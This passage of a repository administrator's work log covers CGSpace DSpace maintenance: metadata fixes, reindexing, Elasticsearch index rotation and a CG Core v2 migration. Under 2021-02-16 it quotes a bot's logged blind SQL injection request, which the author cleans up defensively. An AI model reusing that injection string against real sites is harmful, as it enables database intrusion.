+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/delete-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.relation.ispartofseries -m <span style="color:#ae81ff">43</span>
+</span></span></code></pre></div><ul>
+<li>The corrected versions have a lot of encoding issues so I asked Peter to give me the correct ones so I can search/replace them:
+<ul>
+<li>CIAT PublicaÃ§ao</li>
+<li>CIAT PublicaciÃ³n</li>
+<li>CIAT SÃ©rie</li>
+<li>CIAT SÃ©ries</li>
+<li>ColecciÃ³n investigaciÃ³n y desarrollo</li>
+<li>CTA Guias prÃ¡ticos</li>
+<li>CTA Guias tÃ©cnicas</li>
+<li>Curso de adiestramiento en producciÃ³n y utilizaciÃ³n de pastos tropicales</li>
+<li>Folheto TÃ©cnico</li>
+<li>ILRI Nota Informativa de InvestigaÃ§Ã£o</li>
+<li>Influencia de los actores sociales en AmÃ©rica Central</li>
+<li>Institutionalization of quality assurance mechanism and dissemination of top quality commercial products to increase crop yields and improve food security of smallholder farmers in sub-Saharan Africa â€“ COMPRO-II</li>
+<li>Manuel pour les Banques de GÃ¨nes;1</li>
+<li>SistematizaciÃ³n de experiencias Proyecto ACORDAR</li>
+<li>StrÃ¼ngmann Forum</li>
+<li>UnitÃ© de Recherche</li>
+</ul>
+</li>
+<li>I ended up using <a href="https://github.com/LuminosoInsight/python-ftfy">python-ftfy</a> to fix those very easily, then replaced them in the CSV</li>
+<li>Then I trimmed whitespace at the beginning, end, and around the &ldquo;;&rdquo;, and applied the 1,600 fixes using <code>fix-metadata-values.py</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/fix-metadata-values.py -i /tmp/2020-10-28-Series-PB.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f dc.relation.ispartofseries -t <span style="color:#e6db74">&#39;correct&#39;</span> -m <span style="color:#ae81ff">43</span>
+</span></span></code></pre></div><ul>
+<li>Help Peter debug an issue with one of Alan Duncan&rsquo;s new FEAST Data reports on CGSpace
+<ul>
+<li>For some reason the default policy for the item was &ldquo;COLLECTION_492_DEFAULT_READ&rdquo; group, which had zero members</li>
+<li>I changed them all to Anonymous and the item was accessible</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-02-07">2021-02-07</h2>
+<ul>
+<li>Run system updates on CGSpace (linode18), deploy latest 6_x-prod branch, and reboot the server</li>
+<li>After the server came back up I started a full Discovery re-indexing:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real    247m30.850s
+</span></span><span style="display:flex;"><span>user    160m36.657s
+</span></span><span style="display:flex;"><span>sys     2m26.050s
+</span></span></code></pre></div><ul>
+<li>Regarding the CG Core v2 migration, Fabio wrote to tell me that he is not using CGSpace directly, instead harvesting via GARDIAN
+<ul>
+<li>He gave me the contact of Sotiris Konstantinidis, who is the CTO at SCIO Systems and works on the GARDIAN platform</li>
+</ul>
+</li>
+<li>Delete the old Elasticsearch temp index to prepare for starting an AReS re-harvest:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span># start indexing in AReS
+</span></span></code></pre></div><h2 id="2021-02-08">2021-02-08</h2>
+<ul>
+<li>Finish rotating the AReS indexes after the harvesting last night:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 100983,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-08
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-08&#39;</span>
+</span></span></code></pre></div><h2 id="2021-02-10">2021-02-10</h2>
+<ul>
+<li>Talk to Abdullah from CodeObia about a few of the issues we filed on OpenRXV
+<ul>
+<li>Verify a fix he made for the issue with spaces in template file names</li>
+<li>He says that the <a href="https://github.com/ilri/OpenRXV/issues/49">Angular expressions support should be enabled</a>, but I tried it and couldn&rsquo;t get a few simple examples working</li>
+</ul>
+</li>
+<li>Atmire responded to a few issues today:
+<ul>
+<li>First, the one about a crash while exporting a community CSV, which appears to be a <a href="https://jira.lyrasis.org/browse/DS-4211">vanilla DSpace issue with a patch in DSpace 6.4</a></li>
+<li>Second, the MQM batch consumer issue, which appears to be harmless log spam in <em>most</em> cases and they have sent a patch that adjusts the logging as such</li>
+<li>Third, a version bump for CUA to fix the <code>java.lang.UnsupportedOperationException: Multiple update components target the same field:solr_update_time_stamp</code> error</li>
+</ul>
+</li>
+<li>I cherry-picked the patches for DS-4111 and was able to export the ILRI community finally, but the results are almost twice as many items as in the community!
+<ul>
+<li>Investigating with csvcut I see there are some ids that appear up to five, six, or seven times!</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | wc -l
+</span></span><span style="display:flex;"><span>30354
+</span></span><span style="display:flex;"><span>$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | sort -u | wc -l
+</span></span><span style="display:flex;"><span>18555
+</span></span><span style="display:flex;"><span>$ csvcut -c id /tmp/2021-02-10-ILRI.csv | sed <span style="color:#e6db74">&#39;1d&#39;</span> | sort | uniq -c | sort -h | tail
+</span></span><span style="display:flex;"><span>      5 c21a79e5-e24e-4861-aa07-e06703d1deb7
+</span></span><span style="display:flex;"><span>      5 c2460aa1-ae28-4003-9a99-2d7c5cd7fd38
+</span></span><span style="display:flex;"><span>      5 d73fb3ae-9fac-4f7e-990f-e394f344246c
+</span></span><span style="display:flex;"><span>      5 dc0e24fa-b7f5-437e-ac09-e15c0704be00
+</span></span><span style="display:flex;"><span>      5 dc50bcca-0abf-473f-8770-69d5ab95cc33
+</span></span><span style="display:flex;"><span>      5 e714bdf9-cc0f-4d9a-a808-d572e25c9238
+</span></span><span style="display:flex;"><span>      6 7dfd1c61-9e8c-4677-8d41-e1c4b11d867d
+</span></span><span style="display:flex;"><span>      6 fb76888c-03ae-4d53-b27d-87d7ca91371a
+</span></span><span style="display:flex;"><span>      6 ff42d1e6-c489-492c-a40a-803cabd901ed
+</span></span><span style="display:flex;"><span>      7 094e9e1d-09ff-40ca-a6b9-eca580936147
+</span></span></code></pre></div><ul>
+<li>I added a comment to that bug to ask if this is a side effect of the patch</li>
+<li>I started working on tagging pre-2010 ILRI items with license information, like we talked about with Peter and Abenet last week
+<ul>
+<li>Due to the export bug I had to sort and remove duplicates first, then use csvgrep to filter out books and journal articles:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ csvcut -c <span style="color:#e6db74">&#39;id,dc.date.issued,dc.date.issued[],dc.date.issued[en_US],dc.rights,dc.rights[],dc.rights[en],dc.rights[en_US],dc.publisher,dc.publisher[],dc.publisher[en_US],dc.type[en_US]&#39;</span> /tmp/2021-02-10-ILRI.csv | csvgrep -c <span style="color:#e6db74">&#39;dc.type[en_US]&#39;</span> -r <span style="color:#e6db74">&#39;^.+[^(Journal Item|Journal Article|Book|Book Chapter)]&#39;</span>
+</span></span></code></pre></div><ul>
+<li>I imported the CSV into OpenRefine and converted the date text values to date types so I could facet by dates before 2010:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>if(diff(value,&#34;01/01/2010&#34;.toDate(),&#34;days&#34;)&lt;0, true, false)
+</span></span></code></pre></div><ul>
+<li>Then I filtered by publisher to make sure they were only ours:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>or(
+</span></span><span style="display:flex;"><span>  value.contains(&#34;International Livestock Research Institute&#34;),
+</span></span><span style="display:flex;"><span>  value.contains(&#34;ILRI&#34;),
+</span></span><span style="display:flex;"><span>  value.contains(&#34;International Livestock Centre for Africa&#34;),
+</span></span><span style="display:flex;"><span>  value.contains(&#34;ILCA&#34;),
+</span></span><span style="display:flex;"><span>  value.contains(&#34;ILRAD&#34;),
+</span></span><span style="display:flex;"><span>  value.contains(&#34;International Laboratory for Research on Animal Diseases&#34;)
+</span></span><span style="display:flex;"><span>)
+</span></span></code></pre></div><ul>
+<li>I tagged these pre-2010 items with &ldquo;Other&rdquo; if they didn&rsquo;t already have a license</li>
+<li>I checked 2010 to 2015, and 2016 to date, but they were all tagged already!</li>
+<li>In the end I added the &ldquo;Other&rdquo; license to 1,523 items from before 2010</li>
+</ul>
+<h2 id="2021-02-11">2021-02-11</h2>
+<ul>
+<li>CodeObia keeps working on a few more small issues on OpenRXV
+<ul>
+<li>Abdullah sent fixes for two issues but I couldn&rsquo;t verify them myself so I asked him to check again</li>
+<li>Call with Abdullah and Yousef to discuss some issues</li>
+<li>We got the Angular expressions parser working&hellip;</li>
+</ul>
+</li>
+</ul>
+<h2 id="2021-02-13">2021-02-13</h2>
+<ul>
+<li>Run system updates, deploy latest <code>6_x-prod</code> branch, and reboot CGSpace (linode18)</li>
+<li>Normalize <code>text_lang</code> of DSpace item metadata on CGSpace:</li>
+</ul>
+<pre tabindex="0"><code>dspace=# SELECT DISTINCT text_lang, count(text_lang) FROM metadatavalue WHERE dspace_object_id IN (SELECT uuid FROM item) GROUP BY text_lang ORDER BY count DESC;
+ text_lang |  count  
+-----------+---------
+ en_US     | 2567413
+           |    8050
+ en        |    7601
+           |       0
+(4 rows)
+dspace=# UPDATE metadatavalue SET text_lang=&#39;en_US&#39; WHERE dspace_object_id IN (SELECT uuid FROM item);
+</code></pre><ul>
+<li>Start a full Discovery re-indexing on CGSpace</li>
+</ul>
+<h2 id="2021-02-14">2021-02-14</h2>
+<ul>
+<li>Clear the OpenRXV temp items index:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Then start a full harvesting of CGSpace in the AReS Explorer admin dashboard</li>
+<li>Peter asked me about a few other recently submitted FEAST items that are restricted
+<ul>
+<li>I checked the collection and there was an empty group there for the &ldquo;default read&rdquo; authorization</li>
+<li>I deleted the group and fixed the authorization policies for two new items manually</li>
+</ul>
+</li>
+<li>Upload fifteen items to CGSpace for Peter Ballantyne</li>
+<li>Move 313 journals from series, which Peter had indicated when we were cleaning up the series last week
+<ul>
+<li>I re-purposed one of my Python metadata scripts to create <code>move-metadata-values.py</code></li>
+<li>The script reads a text file with one metadata value per line and moves them from one metadata field id to another</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/move-metadata-values.py -i /tmp/move.txt -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span> -f <span style="color:#ae81ff">43</span> -t <span style="color:#ae81ff">55</span>
+</span></span></code></pre></div><h2 id="2021-02-15">2021-02-15</h2>
+<ul>
+<li>Check the results of the AReS Harvesting from last night:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 101126,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>Set the current items index to read only and make a backup:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39; {&#34;settings&#34;: {&#34;index.blocks.write&#34;:true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items/_clone/openrxv-items-2021-02-15
+</span></span></code></pre></div><ul>
+<li>Delete the current items index and clone the temp one:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -X PUT <span style="color:#e6db74">&#34;localhost:9200/openrxv-items-temp/_settings&#34;</span> -H <span style="color:#e6db74">&#39;Content-Type: application/json&#39;</span> -d<span style="color:#e6db74">&#39;{&#34;settings&#34;: {&#34;index.blocks.write&#34;: true}}&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -s -X POST http://localhost:9200/openrxv-items-temp/_clone/openrxv-items
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-2021-02-15&#39;</span>
+</span></span></code></pre></div><ul>
+<li>Call with Abdullah from CodeObia to discuss community and collection statistics reporting</li>
+</ul>
+<h2 id="2021-02-16">2021-02-16</h2>
+<ul>
+<li>Linode emailed me to say that CGSpace (linode18) had a high CPU usage this afternoon</li>
+<li>I looked in the nginx logs and found a few heavy users:
+<ul>
+<li>45.146.165.203 in Russia with user agent <code>Opera/9.80 (Windows NT 6.1; U; cs) Presto/2.2.15 Version/10.00</code></li>
+<li>130.255.161.231 in Sweden with user agent <code>Mozilla/5.0 (Macintosh; Intel Mac OS X 11.1; rv:84.0) Gecko/20100101 Firefox/84.0</code></li>
+</ul>
+</li>
+<li>They are definitely bots posing as users, as I see they have created six thousand DSpace sessions today:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat dspace.log.2021-02-16 | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=45.146.165.203&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>4007
+</span></span><span style="display:flex;"><span>$ cat dspace.log.2021-02-16 | grep -E <span style="color:#e6db74">&#39;session_id=[A-Z0-9]{32}:ip_addr=130.255.161.231&#39;</span> | sort | uniq | wc -l
+</span></span><span style="display:flex;"><span>2128
+</span></span></code></pre></div><ul>
+<li>Ah, actually 45.146.165.203 is making requests like this:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>&#34;http://cgspace.cgiar.org:80/bitstream/handle/10568/238/Res_report_no3.pdf;jsessionid=7311DD88B30EEF9A8F526FF89378C2C5%&#39; AND 4313=CONCAT(CHAR(113)+CHAR(98)+CHAR(106)+CHAR(112)+CHAR(113),(SELECT (CASE WHEN (4313=4313) THEN CHAR(49) ELSE CHAR(48) END)),CHAR(113)+CHAR(106)+CHAR(98)+CHAR(112)+CHAR(113)) AND &#39;XzQO%&#39;=&#39;XzQO&#34;
+</span></span></code></pre></div><ul>
+<li>I purged the hits from these two using my <code>check-spider-ip-hits.sh</code>:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
+</span></span><span style="display:flex;"><span>Purging 4005 hits from 45.146.165.203 in statistics
+</span></span><span style="display:flex;"><span>Purging 3493 hits from 130.255.161.231 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 7498
+</span></span></code></pre></div><ul>
+<li>Ugh, I looked in Solr for the top IPs in 2021-01 and found a few more of these Russian IPs so I purged them too:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
+</span></span><span style="display:flex;"><span>Purging 27163 hits from 45.146.164.176 in statistics
+</span></span><span style="display:flex;"><span>Purging 19556 hits from 45.146.165.105 in statistics
+</span></span><span style="display:flex;"><span>Purging 15927 hits from 45.146.165.83 in statistics
+</span></span><span style="display:flex;"><span>Purging 8085 hits from 45.146.165.104 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 70731
+</span></span></code></pre></div><ul>
+<li>My god, and 64.39.99.15 is from Qualys, the domain scanning security people, who are making queries trying to see if we are vulnerable or something (wtf?)
+<ul>
+<li>Looking in Solr I see a few different IPs with DNS like <code>sn003.s02.iad01.qualys.com.</code> so I will purge their requests too:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ ./ilri/check-spider-ip-hits.sh -f /tmp/ips -p
+</span></span><span style="display:flex;"><span>Purging 3 hits from 130.255.161.231 in statistics
+</span></span><span style="display:flex;"><span>Purging 16773 hits from 64.39.99.15 in statistics
+</span></span><span style="display:flex;"><span>Purging 6976 hits from 64.39.99.13 in statistics
+</span></span><span style="display:flex;"><span>Purging 13 hits from 64.39.99.63 in statistics
+</span></span><span style="display:flex;"><span>Purging 12 hits from 64.39.99.65 in statistics
+</span></span><span style="display:flex;"><span>Purging 12 hits from 64.39.99.94 in statistics
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>Total number of bot hits purged: 23789
+</span></span></code></pre></div><h2 id="2021-02-17">2021-02-17</h2>
+<ul>
+<li>I tested Node.js 10 vs 12 on CGSpace (linode18) and DSpace Test (linode26) and the build times were surprising
+<ul>
+<li>Node.js 10
+<ul>
+<li>linode26: [INFO] Total time:  17:07 min</li>
+<li>linode18: [INFO] Total time:  19:26 min</li>
+</ul>
+</li>
+<li>Node.js 12
+<ul>
+<li>linode26: [INFO] Total time:  17:14 min</li>
+<li>linode18: [INFO] Total time:  19:43 min</li>
+</ul>
+</li>
+</ul>
+</li>
+<li>So I guess there is no need to use Node.js 12 any time soon, unless 10 becomes end of life</li>
+<li>Abenet asked me to add Tom Randolph&rsquo;s ORCID identifier to CGSpace</li>
+<li>I also tagged all his 247 existing items on CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ cat 2021-02-17-add-tom-orcid.csv 
+</span></span><span style="display:flex;"><span>dc.contributor.author,cg.creator.id
+</span></span><span style="display:flex;"><span>&#34;Randolph, Thomas F.&#34;,&#34;Thomas Fitz Randolph: 0000-0003-1849-9877&#34;
+</span></span><span style="display:flex;"><span>$ ./ilri/add-orcid-identifiers-csv.py -i 2021-02-17-add-tom-orcid.csv -db dspace -u dspace -p <span style="color:#e6db74">&#39;fuuu&#39;</span>
+</span></span></code></pre></div><h2 id="2021-02-20">2021-02-20</h2>
+<ul>
+<li>Test the CG Core v2 migration on DSpace Test (linode26) one last time</li>
+</ul>
+<h2 id="2021-02-21">2021-02-21</h2>
+<ul>
+<li>Start the CG Core v2 migration on CGSpace (linode18)</li>
+<li>After deploying the latest <code>6_x-prod</code> branch and running <code>migrate-fields.sh</code> I started a full Discovery reindex:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ time chrt -b <span style="color:#ae81ff">0</span> ionice -c2 -n7 nice -n19 dspace index-discovery -b
+</span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010">
+</span></span></span><span style="display:flex;"><span><span style="color:#960050;background-color:#1e0010"></span>real    311m12.617s
+</span></span><span style="display:flex;"><span>user    217m3.102s
+</span></span><span style="display:flex;"><span>sys     2m37.363s
+</span></span></code></pre></div><ul>
+<li>Then update OAI:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ dspace oai import -c
+</span></span><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#34;-Dfile.encoding=UTF-8 -Xmx2048m&#34;</span>
+</span></span></code></pre></div><ul>
+<li>Ben Hack was asking if there is a REST API query that will give him all ILRI outputs for their new Sharepoint intranet
+<ul>
+<li>I told him he can try to use something like this if it&rsquo;s just something like the ILRI articles in journals collection:</li>
+</ul>
+</li>
+</ul>
+<p><a href="https://cgspace.cgiar.org/rest/collections/8ea4b611-1f59-4d4e-b78d-a9921a72cfe7/items?limit=100&amp;offset=0">https://cgspace.cgiar.org/rest/collections/8ea4b611-1f59-4d4e-b78d-a9921a72cfe7/items?limit=100&amp;offset=0</a></p>
+<ul>
+<li>But I don&rsquo;t know if he wants the entire ILRI community, in which case he needs to get the collections recursively and iterate over them, or if his software can manage the iteration over the pages of item results using limit and offset</li>
+<li>Help proof and upload 1095 CIFOR items to DSpace Test for Abenet
+<ul>
+<li>There were a few dozen issues with author affiliations, but the metadata was otherwise very good quality</li>
+<li>I ran the data through the csv-metadata-quality tool nevertheless to fix some minor formatting issues</li>
+<li>I uploaded it to DSpace Test to check for duplicates</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ export JAVA_OPTS<span style="color:#f92672">=</span><span style="color:#e6db74">&#39;-Dfile.encoding=UTF-8 -Xmx1024m&#39;</span>
+</span></span><span style="display:flex;"><span>$ dspace metadata-import -e aorth@mjanja.ch -f /tmp/cifor.csv
+</span></span></code></pre></div><ul>
+<li>The process took an hour or so!</li>
+<li>I added colorized output to the csv-metadata-quality tool and tagged <a href="https://github.com/ilri/csv-metadata-quality/releases/tag/v0.4.4">version 0.4.4 on GitHub</a></li>
+<li>I updated the fields in AReS Explorer and then removed the old temp index so I can start a fresh re-harvest of CGSpace:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -XDELETE <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp&#39;</span>
+</span></span><span style="display:flex;"><span># start indexing in AReS
+</span></span></code></pre></div><h2 id="2021-02-22">2021-02-22</h2>
+<ul>
+<li>Start looking at splitting the series name and number in <code>dcterms.isPartOf</code> now that we have migrated to CG Core v2
+<ul>
+<li>The numbers will go to <code>cg.number</code></li>
+<li>I notice there are about 100 series without a number, but they still have a semicolon, for example <code>Esporo 72;</code></li>
+<li>I think I will replace those like this:</li>
+</ul>
+</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>localhost/dspace63= &gt; UPDATE metadatavalue SET text_value = REGEXP_REPLACE(text_value, &#39;^(.+?);$&#39;,&#39;\1&#39;, &#39;g&#39;) WHERE metadata_field_id=166 AND dspace_object_id IN (SELECT uuid FROM item) AND text_value ~ &#39;;$&#39;;
+</span></span><span style="display:flex;"><span>UPDATE 104
+</span></span></code></pre></div><ul>
+<li>As for splitting the other values, I think I can export the <code>dspace_object_id</code> and <code>text_value</code> and then upload it as a CSV rather than writing a Python script to create the new metadata values</li>
+</ul>
+<h2 id="2021-02-22-1">2021-02-22</h2>
+<ul>
+<li>Check the results of the AReS harvesting from last night:</li>
+</ul>
+<div class="highlight"><pre tabindex="0" style="color:#f8f8f2;background-color:#272822;-moz-tab-size:4;-o-tab-size:4;tab-size:4;"><code class="language-console" data-lang="console"><span style="display:flex;"><span>$ curl -s <span style="color:#e6db74">&#39;http://localhost:9200/openrxv-items-temp/_count?q=*&amp;pretty&#39;</span>
+</span></span><span style="display:flex;"><span>{
+</span></span><span style="display:flex;"><span>  &#34;count&#34; : 101380,
+</span></span><span style="display:flex;"><span>  &#34;_shards&#34; : {
+</span></span><span style="display:flex;"><span>    &#34;total&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;successful&#34; : 1,
+</span></span><span style="display:flex;"><span>    &#34;skipped&#34; : 0,
+</span></span><span style="display:flex;"><span>    &#34;failed&#34; : 0
+</span></span><span style="display:flex;"><span>  }
+</span></span><span style="display:flex;"><span>}
+</span></span></code></pre></div><ul>
+<li>Set the current items index to read only and make a backup:</li>
+</ul>
